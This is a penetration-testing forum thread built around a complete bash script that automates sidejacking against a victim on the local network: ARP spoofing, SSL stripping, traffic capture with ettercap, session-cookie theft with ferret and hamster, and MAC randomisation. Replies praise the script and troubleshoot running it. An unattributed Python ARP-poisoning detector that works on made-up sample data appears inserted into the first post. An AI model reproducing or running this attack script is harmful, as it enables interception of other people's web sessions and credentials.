Page 1 of 2
Results 1 to 10 of 15

Thread: Another script for sidejacking..

  1. #1
    Just burned his ISO
    Join Date
    Nov 2010
    Location
    Greece
    Posts
    7

    Default Another script for sidejacking..

    I know there are other scripts out there that do the same thing but, here is one I made. Perhaps someone else will find it useful. It basically uses hamster, ferret, sslstrip, ettercap, urlsnarf, and arpspoof, although adding your favourite program shouldn't be too difficult.

    I tested it in Backtrack 4 R2. One thing to note is the paths of ferret and hamster are hardcoded because it seems there is a problem with just executing them as is. At least on my R2 installation. You can customize it to suit your own needs, like the xterm window sizes and a few other things.

    Code is here:
    Gorara - sidejackssl.sh

    And here:
    Code:
    #!/bin/bash
    
    # sidejackssl.sh v0.1
    # tested in backtrack 4 R2 environment, run as root.
    # xterm used for window control
    # arpspoof poisons a single victim and gateway
    # ferret and hamster for sidejacking
    # sslstrip for https
    # ettercap for everything else
    # urlsnarf to monitor visited urls
    # firefox needs to be configured with a proxy of 127.0.0.1:1234
    # url for hamster server is http://hamster
    # by gorara
    
    # a few variables (do not change)
    m1="0"					# missing file var m1
    m2="0"					# missing file var m2
    m3="0"					# missing file var m3
    m4="0"					# missing file var m4
    quickclean="0"				# used for quick clean up
    randmac="n"				# default setting do not randomize MAC
    hamsterfile="hamster.txt"		# hamster output file (you can't change it)
    trap 'cleanup' SIGINT SIGTERM		# detect control-c
    
    # a few more variables (change these if required)
    
    # xterm window variables
    x="0"					# x offset value
    y="0"					# y offset value
    width="120"				# width value
    height="7"				# height value
    yoffset="120"				# y offset
    fgcolor="white"				# foreground color
    bgcolor="black"				# background color
    
    # style variables
    warnstyle="[\e[01;38mw\e[00m]"		# warning msgs style
    execstyle="[\e[01;32mx\e[00m]"		# execute msgs style
    infostyle="[\e[01;34mi\e[00m]"		# informational msgs style
    inputstyle="[\e[01;30m?\e[00m]"		# input msgs style
    
    # file variables
    sslstripfile="sslstrip.log"		# sslstrip output file name
    snifffile="sniff-*"			# hamster sniff file wildcard
    etterfile="etter.cap"			# ettercap output cap file
    temp="/tmp"				# temporary dir
    
    function usage
    {
    	clear
    	echo "Usage: bash $0 -i interface -t target -g gateway [-r] [-h]"
    	echo ""
    	echo "	-i interface	interface to use, ex. eth0, wlan0."
    	echo "	-t target	the target IP address."
    	echo "	-g gateway	the gateway IP address."
    	echo "	-r		randomize your MAC address,"
    	echo "			only use for wired interfaces."
    	echo "	-h		display this help screen."
    	echo ""
    	echo "	examples: "
    	echo "	 bash $0 -i eth0 -t 192.168.0.1 -g 192.168.0.254 -r"
    	echo "	 bash $0 -i wlan0 -t 192.168.0.1 -g 192.168.0.254"
    	echo ""
    	exit 0
    }
    
    function cleanup() {
    echo -e "\n$warnstyle control-c pressed! "
    
    # exit script if nothing has been modified
    if [[ "$quickclean" = "1" ]]; then
    echo -e "$infostyle nothing changed, all done!"
    exit 0
    fi
    
    echo -e "$infostyle cleaning up..."
    echo -e "$execstyle flushing iptables..."
    iptables -F
    iptables -t nat -F
    
    echo -e "$execstyle turning off IP forwarding..."
    echo "0" > /proc/sys/net/ipv4/ip_forward
    
    # change back MAC address to orignal one
    if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then
    echo -e "$execstyle resetting MAC address...";
    echo -e "$infostyle original MAC is: $origmac"
    ifconfig $interface down
    ifconfig $interface hw ether $origmac
    ifconfig $interface up
    	if [ -z $gw ]; then
    	echo -e "$warnstyle WARNING, you have no default gateway!"
    	else
    	route add default gw $gw
    	fi
    rm $temp/mac.orig
    rm $temp/gw.orig
    fi
    
    echo -e "$execstyle cleaning up files..."
    echo -e "$infostyle temp directory: "
    
    # testing to see if files exist, if so display them...
    	if [ -f $temp/$sslstripfile ]; then
    	ls $temp/$sslstripfile
    	else
    	#echo -e "$warnstyle missing $sslstripfile"
    	m1="1"
    	fi
    
    	if [ -f $temp/$etterfile ]; then
    	ls $temp/$etterfile
    	else
    	#echo -e "$warnstyle missing $etterfile"
    	m2="1"
    	fi
    
    echo -e "$infostyle current directory: "
    
    	if [ -f $snifffile ]; then
    	ls $snifffile
    	else
    	#echo -e "$warnstyle missing $snifffile"
    	m3="1"
    	fi
    
    	if [ -f $hamsterfile ]; then
    	ls $hamsterfile
    	else
    	#echo -e "$warnstyle missing $hamsterfile"
    	m4="1"
    	fi
    
    # testing to see if there are any files at all
    if [[ $m1 -eq 0 || $m2 -eq 0 || $m3 -eq 0 || $m4 -eq 0 ]]; then
    
    while [[ "$delete" != "y" && "$delete" != "n" ]]
    
    echo -en "$infostyle delete file(s)? [y/n]: " 
    read delete
    
    do
        case "$delete" in
            y) delete_marker="y"; echo -e "$warnstyle deleting files!"; break;;
    	n) echo -e "$warnstyle nothing deleted!"; break;;
        	*) echo -e "$warnstyle wrong selection!";
        esac
    done
    
    # delete files as requested
    if [[ "$delete_marker" = "y" ]]; then
    	if [ -f $temp/$sslstripfile ]; then
    	rm $temp/$sslstripfile
    	fi
    
    	if [ -f $temp/$etterfile ]; then
    	rm $temp/$etterfile
    	fi
    
    	if [ -f $snifffile ]; then
    	rm $snifffile
    	fi
    
    	if [ -f $hamsterfile ]; then
    	rm $hamsterfile
    	fi
    fi
    
    else
    
    	echo -e "$warnstyle nothing to delete!"
    fi
    
    echo -e "$infostyle all done!"
    exit 0
    }
    
    
    # start main program
    if [ "$#" -eq 0 ]; then
    usage
    fi
    
    while [ "$#" -gt 0 ]
    do
        case "$1" in
            -i)  interface=$2; shift 1;;
    	-r)  randmac="y"; shift 1;;
    	-t)  target=$2; shift 1;;
    	-g)  gateway=$2; shift 1;;
    	-h)  usage;;
    	-*)  usage; break;;
    	*)  break;;
        esac
        shift
    done
    
    # required parameters
    if [[ -z $interface || -z $target || -z $gateway ]]; then
    usage
    exit 0
    fi
    
    clear
    
    if [[ "$randmac" = "y" ]]; then
    mac="yes"
    else
    mac="no"
    fi
    
    # set quick cleanup flag
    quickclean="1"
    
    echo -e "$infostyle sidejacker/sslstrip script v0.1, by gorara"
    echo -e "$infostyle ctrl-c to abort at any time."
    echo -e "$infostyle attack summary:"
    echo -e "$infostyle host $target and gateway $gateway from $interface, spoof MAC: $mac"
    
    if [[ "$randmac" = "y" ]]; then 
    
    echo -e "$execstyle change of $interface MAC address requested."
    
    if [[ "$interface" = wlan* || "$interface" = wifi* || "$interface" = ath* ]]; then
    echo -e "$infostyle wireless device detected..." 
    echo -e "$warnstyle can't change MAC address without taking wifi interface down"
    echo -e "$warnstyle do it manually before connecting to the AP."
    exit 0
    fi
    
    if [[ "$interface" = eth* ]]; then
    echo -e "$infostyle wired device detected..." 
    echo -e "$warnstyle WARNING, this will take your wired interface down temporarily."
    echo -en "$inputstyle do you want to continue? [y/n]: "
    read continue
    	if [[ "$continue" = "y" ]]; then
    	echo -e "$infostyle proceeding..."
    	else
    	echo -e "$infostyle exiting..."
    	exit 0	
    	fi
    fi
    
    origmac=`ifconfig $interface | grep HWaddr | awk {'print $5'}`
    
    fi
    
    # before this, ctrl-c will exit script without doing anything.
    quickclean="0"
    
    # use macchanger to randomize MAC address, etc.
    if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then 
    echo -e "$execstyle randomizing MAC address...";
    gw=`route -n | grep UG | awk {'print $2'}`
    echo "$gw" > $temp/gw.orig		# save original default gateway for cleanup
    ifconfig $interface down
    macchanger -r $interface > $temp/mac.orig
    ifconfig $interface up
    	if [ -z $gw ]; then
    	echo -e "$warnstyle WARNING, you have no default gateway!"
    	else
    	route add default gw $gw
    	fi
    origmac=`cat $temp/mac.orig | grep Current | awk {'print $3'}`
    fakemac=`cat $temp/mac.orig | grep Faked | awk {'print $3'}`
    echo -e "$infostyle original MAC is: $origmac"
    echo -e "$infostyle faked    MAC is: $fakemac"
    fi
    
    echo -e "$execstyle turning on IP Forwarding..."
    echo "1" > /proc/sys/net/ipv4/ip_forward
    
    echo -e "$execstyle configuring iptables..."
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    sleep 1
    
    echo -e "$execstyle starting hamster  ... <logging to: $hamsterfile>"
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "hamster" -e /pentest/sniffers/hamster/hamster &
    sleep 2
    
    echo -e "$execstyle starting ferret   ... <logging to: console>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ferret" -e /pentest/sniffers/hamster/ferret -i $interface &
    sleep 2
    
    echo -e "$execstyle starting sslstrip ... <logging to: $temp/$sslstripfile>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "sslstrip" -e sslstrip -w $temp/$sslstripfile &
    sleep 2
    
    echo -e "$execstyle starting ettercap ... <logging to: $temp/$etterfile>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ettercap" -e ettercap -Tqpi $interface -w $temp/$etterfile /$gateway/ /$target/ &
    sleep 2
    
    echo -e "$execstyle starting urlsnarf ... <logging to: console>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "urlsnarf" -e urlsnarf -i $interface &
    sleep 2
    
    echo -e "$infostyle trap is ready, now to direct traffic..."
    
    echo -e "$execstyle ARP poisoning the target..."
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "arpspoof" -e arpspoof -i $interface -t $target $gateway &
    sleep 1
    
    echo -e "$infostyle run firefox and type http://hamster"
    echo -e "$infostyle don't forget to set proxy to 127.0.0.1:1234"
    echo -e "$infostyle press ctrl-c to exit and clean up... \n"
    for ((;;)) do 
    read loop
    echo -en "$infostyle press ctrl-c to terminate!"
    done
    
    exit 0
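    The script's arpspoof step makes the victim learn a new MAC for the gateway. A small host-side monitor can catch exactly that symptom. The following is an added example, not part of the script or of any post in this thread: it replays constructed ARP reply records (timestamp, sender IP, sender MAC; the gateway address 192.168.0.254 and all MACs are made up) and flags a known IP changing MAC, escalated when the IP is the gateway, plus one MAC claiming several addresses.

```python
from collections import defaultdict

# Constructed sample of ARP replies as a host-based monitor might log them:
# "epoch sender_ip sender_mac". Not real captured traffic.
SAMPLE_ARP_REPLIES = """\
1000 192.168.0.254 00:11:22:33:44:55
1001 192.168.0.1 00:aa:bb:cc:dd:01
1002 192.168.0.254 00:11:22:33:44:55
1030 192.168.0.254 00:DE:AD:BE:EF:99
1031 192.168.0.254 00:de:ad:be:ef:99
1032 192.168.0.2 00:de:ad:be:ef:99
"""


def parse_replies(text):
    """Parse 'epoch ip mac' lines into (int, str, str) tuples, MAC lower-cased."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, mac = line.split()
        rows.append((int(ts), ip, mac.lower()))
    return rows


def detect_poisoning(replies, gateway_ip):
    """Return alert strings for IP->MAC changes and multi-IP MACs.

    A legitimate DHCP reassignment or NIC swap also trips the MEDIUM rule,
    so the gateway changing MAC (HIGH) is the signal worth paging on.
    """
    alerts = []
    learned = {}                     # ip -> mac first seen for that ip
    ips_per_mac = defaultdict(set)   # mac -> set of ips it has claimed
    for ts, ip, mac in replies:
        prev = learned.setdefault(ip, mac)
        if prev != mac:
            sev = "HIGH" if ip == gateway_ip else "MEDIUM"
            alerts.append(f"{sev} t={ts}: {ip} moved from {prev} to {mac}")
            learned[ip] = mac
        before = len(ips_per_mac[mac])
        ips_per_mac[mac].add(ip)
        # Alert once each time a MAC grows to cover more than one address.
        if len(ips_per_mac[mac]) > before and len(ips_per_mac[mac]) > 1:
            claimed = ", ".join(sorted(ips_per_mac[mac]))
            alerts.append(f"MEDIUM t={ts}: {mac} now claims "
                          f"{len(ips_per_mac[mac])} addresses: {claimed}")
    return alerts


if __name__ == "__main__":
    for a in detect_poisoning(parse_replies(SAMPLE_ARP_REPLIES), "192.168.0.254"):
        print(a)
```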

  2. #2
    Junior Member
    Join Date
    Jan 2010
    Posts
    55

    Default Re: Another script for sidejacking..

    Very slick. Will test tonight and provide feedback. You should start a google code page to track changes.

  3. #3
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    13

    Default Riferimento: Another script for sidejacking..

    It's not working. I use R2 but I get an error when I run it:

    sh sidejacking.sh

  4. #4
    Administrator sickness
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: Riferimento: Another script for sidejacking..

    Quote Originally Posted by Xploit View Post
    It's not working. I use R2 but I get an error when I run it:

    sh sidejacking.sh
    And we are just supposed to know what happened if you don't give us the error message?
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  5. #5
    Member
    Join Date
    Feb 2010
    Location
    MTI3LjAuMC4x
    Posts
    90

    Default Re: Riferimento: Another script for sidejacking..

    Quote Originally Posted by Xploit View Post
    It's not working. I use R2 but I get an error when I run it:

    sh sidejacking.sh
    I am going to take a guess.

    You need to

    chmod +x sidejacking.sh

    (you need to make the script executable)

  6. #6
    Just burned his ISO
    Join Date
    Nov 2010
    Location
    Greece
    Posts
    7

    Default Re: Riferimento: Another script for sidejacking..

    Quote Originally Posted by spudgunman View Post
    I am going to take a guess.

    You need to

    chmod +x sidejacking.sh

    (you need to make the script executable)
    Actually, that's not really required. Simply copy-paste the code into a file, save it as sidejackssl.sh (or whatever you want), and run it like this:

    Code:
    bash sidejackssl.sh
    It requires parameters, which the script will show you if you run it like this. You can change it to make it executable and run as ./sidejackssl.sh if you wish.

  7. #7
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    4

    Default Re: Another script for sidejacking..

    root@bt:~# bash sidejackssl.sh
    : command not founde 2:
    : command not founde 14:
    : command not founde 24:
    : command not founde 26:
    : command not founde 35:
    : command not founde 41:
    : command not founde 47:
    'idejackssl.sh: line 49: syntax error near unexpected token `{
    'idejackssl.sh: line 49: `{

    I'm attempting to run this on BT4-R2. I get this error doing it both as "bash sidejackssl.sh" and "./sidejackssl.sh".

    Just reporting; I'm sorry if the answer is simple and beyond my grasp.

  8. #8
    Just burned his ISO
    Join Date
    Nov 2010
    Location
    Greece
    Posts
    7

    Default Re: Another script for sidejacking..

    Quote Originally Posted by fromthestars View Post
    I'm attempting to run this on BT4-R2. I get this error doing it both as "bash sidejackssl.sh" and "./sidejackssl.sh".

    Just reporting; I'm sorry if the answer is simple and beyond my grasp.
    It looks like you may have copy-pasted the code from pastebin; if so, you may have copied the line numbers too. Try pressing the RAW option in pastebin and copying the raw text, or copy the code from the initial post.

  9. #9
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    13

    Default Riferimento: Another script for sidejacking..

    : command not founde 2:
    : command not founde 14:
    : command not founde 24:
    : command not founde 26:
    : command not founde 35:
    : command not founde 41:
    : command not founde 47:
    'idejackssl.sh: line 49: syntax error near unexpected token `{
    'idejackssl.sh: line 49: `{

  10. #10
    Junior Member
    Join Date
    Aug 2010
    Posts
    51

    Default Re: Another script for sidejacking..

    Absolutely brilliant. It works like a bomb. I just need to test the BackTrack Linux - Penetration Testing Distribution proxy but rest of the stuff in the meantime.

    Excellent work
